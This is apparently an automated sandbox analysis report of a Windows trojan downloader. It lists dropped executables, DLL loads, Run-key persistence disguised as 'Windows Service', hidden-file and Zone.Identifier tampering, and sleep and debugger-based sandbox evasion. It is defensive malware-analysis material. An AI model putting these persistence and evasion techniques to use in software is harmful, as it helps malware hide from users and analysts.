                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2711236308.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2711236308.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\winploravr.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1245832676.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1245832676.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\winploravr.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\sysbrapsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB2501 push ecx; ret 7_2_00DB2514
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeCode function: 8_2_00B51741 push ecx; ret 8_2_00B51754
                            Source: C:\Users\user\winploravr.exeCode function: 9_2_002A2501 push ecx; ret 9_2_002A2514
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeCode function: 10_2_00D72EA1 push ecx; ret 10_2_00D72EB4
                            Source: C:\Users\user\AppData\Local\Temp\2711236308.exeCode function: 13_2_00391741 push ecx; ret 13_2_00391754
                            Source: C:\Windows\winploravr.exeCode function: 14_2_000F2501 push ecx; ret 14_2_000F2514
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeCode function: 15_2_006F1751 push ecx; ret 15_2_006F1764
                            Source: C:\Users\user\AppData\Local\Temp\1245832676.exeCode function: 16_2_00AE1741 push ecx; ret 16_2_00AE1754
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCode function: 18_2_003F1891 push ecx; ret 18_2_003F18A4

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Executable created and started: C:\Windows\sysbrapsvc.exe
Source: unknown | Executable created and started: C:\Windows\winploravr.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | File created: C:\Windows\sysbrapsvc.exe
Source: C:\Windows\sysbrapsvc.exe | File created: C:\Users\user\AppData\Local\Temp\2006625995.exe
Source: C:\Windows\sysbrapsvc.exe | File created: C:\Users\user\AppData\Local\Temp\330125677.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File created: C:\Windows\winploravr.exe
Source: C:\Windows\sysbrapsvc.exe | File created: C:\Users\user\AppData\Local\Temp\3193211493.exe
Source: C:\Windows\sysbrapsvc.exe | File created: C:\Users\user\AppData\Local\Temp\300129380.exe
Source: C:\Windows\sysbrapsvc.exe | File created: C:\Users\user\AppData\Local\Temp\1146722911.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File created: C:\Users\user\AppData\Local\Temp\2711236308.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File created: C:\Users\user\AppData\Local\Temp\1245832676.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File created: C:\Users\user\winploravr.exe
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File created: C:\Users\user\AppData\Local\Temp\2303012543.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File created: C:\Users\user\winploravr.exe
Source: C:\Windows\sysbrapsvc.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run (value: Windows Settings)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run (value: Windows Service)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (value: Windows Service)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\sysbrapsvc.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL (value: CheckedValue)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | File opened: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\sysbrapsvc.exe | File opened: C:\Windows\sysbrapsvc.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\sysbrapsvc.exe | File opened: C:\Users\user\AppData\Local\Temp\3193211493.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\sysbrapsvc.exe | File opened: C:\Users\user\AppData\Local\Temp\1146722911.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\sysbrapsvc.exe | File opened: C:\Users\user\AppData\Local\Temp\1655423207.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\sysbrapsvc.exe | File opened: C:\Users\user\AppData\Local\Temp\3109025629.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\sysbrapsvc.exe | File opened: C:\Users\user\AppData\Local\Temp\2006625995.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\sysbrapsvc.exe | File opened: C:\Users\user\AppData\Local\Temp\330125677.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\sysbrapsvc.exe | File opened: C:\Users\user\AppData\Local\Temp\300129380.exe:Zone.Identifier (read attributes | delete)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File opened: C:\Users\user\AppData\Local\Temp\1146722911.exe:Zone.Identifier (read attributes | delete)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File opened: C:\Users\user\AppData\Local\Temp\2303012543.exe:Zone.Identifier (read attributes | delete)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File opened: C:\Users\user\AppData\Local\Temp\2711236308.exe:Zone.Identifier (read attributes | delete)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File opened: C:\Users\user\AppData\Local\Temp\1245832676.exe:Zone.Identifier (read attributes | delete)
Source: C:\Users\user\AppData\Local\Temp\2006625995.exe | File opened: C:\Users\user\AppData\Local\Temp\2006625995.exe:Zone.Identifier (read attributes | delete)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2303012543.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\winploravr.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2006625995.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2711236308.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\winploravr.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\330125677.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1245832676.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_0040D1A0
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_0040D1A0
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_0040D1A0
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_0040D1A0
Source: C:\Users\user\AppData\Local\Temp\2006625995.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Windows\sysbrapsvc.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_4-4374)
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_5-4374)
Source: C:\Windows\winploravr.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\winploravr.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Windows\winploravr.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\2006625995.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\sysbrapsvc.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_4-4374)
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_5-4374)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_7-303)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_7-303)
Source: C:\Users\user\winploravr.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Thread delayed: delay time: 900000
Source: C:\Windows\sysbrapsvc.exe | Window / User API: threadDelayed 6126
Source: C:\Users\user\AppData\Local\Temp\2006625995.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Evaded block: after key decision (graph_0-4400)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Evaded block: after key decision (graph_0-4376)
Source: C:\Windows\sysbrapsvc.exe | Evaded block: after key decision (graph_4-4374)
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Evaded block: after key decision (graph_5-4374)
Source: C:\Users\user\winploravr.exe | Evaded block: after key decision
Source: C:\Windows\winploravr.exe | Evaded block: after key decision
Source: C:\Windows\sysbrapsvc.exe | Evasive API call chain: RegQueryValue,DecisionNodes,Sleep (graph_2-5787)
Source: C:\Windows\sysbrapsvc.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_2-4405)
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_7-311)
Source: C:\Windows\winploravr.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_5-4404)
Source: C:\Users\user\winploravr.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_0-4404)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | API coverage: 3.7 %
Source: C:\Windows\sysbrapsvc.exe | API coverage: 0.9 %
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | API coverage: 0.9 %
Source: C:\Users\user\winploravr.exe | API coverage: 6.0 %
Source: C:\Users\user\AppData\Local\Temp\2006625995.exe | API coverage: 9.8 %
Source: C:\Windows\winploravr.exe | API coverage: 6.0 %
Source: C:\Windows\sysbrapsvc.exe | TID: 5444 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\sysbrapsvc.exe | TID: 5452 | Thread sleep count: 105 > 30
Source: C:\Windows\sysbrapsvc.exe | TID: 5452 | Thread sleep time: -210000s >= -30000s
Source: C:\Windows\sysbrapsvc.exe | TID: 6484 | Thread sleep time: -113015s >= -30000s
Source: C:\Windows\sysbrapsvc.exe | TID: 5452 | Thread sleep count: 6126 > 30
Source: C:\Windows\sysbrapsvc.exe | TID: 5452 | Thread sleep time: -12252000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | TID: 2344 | Thread sleep count: 46 > 30
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | TID: 2344 | Thread sleep time: -46000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | TID: 2344 | Thread sleep time: -4500000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect
Source: C:\Windows\sysbrapsvc.exe | Thread delayed: delay time: 30000
Source: C:\Windows\sysbrapsvc.exe | Thread delayed: delay time: 113015
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Thread delayed: delay time: 900000
Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.000000000093C000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000002.2003173720.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                            Source: 2006625995.exe, 0000000A.00000002.2105883206.0000000000B18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Windows\sysbrapsvc.exeAPI call chain: ExitProcess graph end nodegraph_2-4420
                            Source: C:\Windows\sysbrapsvc.exeAPI call chain: ExitProcess graph end nodegraph_4-4419
                            Source: C:\Windows\sysbrapsvc.exeAPI call chain: ExitProcess graph end nodegraph_4-4388
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeAPI call chain: ExitProcess graph end nodegraph_5-4419
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeAPI call chain: ExitProcess graph end nodegraph_5-4388
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeAPI call chain: ExitProcess graph end nodegraph_7-305
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeAPI call chain: ExitProcess graph end nodegraph_7-316
                            Source: C:\Users\user\winploravr.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\winploravr.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB2638 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,7_2_00DB2638
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040A390 GetProcessHeaps,0_2_0040A390
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB2638 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,7_2_00DB2638
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeCode function: 8_2_00B51878 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,8_2_00B51878
                            Source: C:\Users\user\winploravr.exeCode function: 9_2_002A2638 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,9_2_002A2638
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeCode function: 10_2_00D72FD8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,10_2_00D72FD8
                            Source: C:\Users\user\AppData\Local\Temp\2711236308.exeCode function: 13_2_00391878 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,13_2_00391878
                            Source: C:\Windows\winploravr.exeCode function: 14_2_000F2638 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,14_2_000F2638
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeCode function: 15_2_006F1888 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,15_2_006F1888
                            Source: C:\Users\user\AppData\Local\Temp\1245832676.exeCode function: 16_2_00AE1878 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,16_2_00AE1878
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCode function: 18_2_003F19C8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,18_2_003F19C8
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: GetLocaleInfoA,strcmp,0_2_0040EBE0
                            Source: C:\Windows\sysbrapsvc.exeCode function: GetLocaleInfoA,strcmp,2_2_0040EBE0
                            Source: C:\Windows\sysbrapsvc.exeCode function: GetLocaleInfoA,strcmp,4_2_0040EBE0
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: GetLocaleInfoA,strcmp,5_2_0040EBE0
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: memset,GetLocaleInfoA,strcmp,7_2_00DB1740
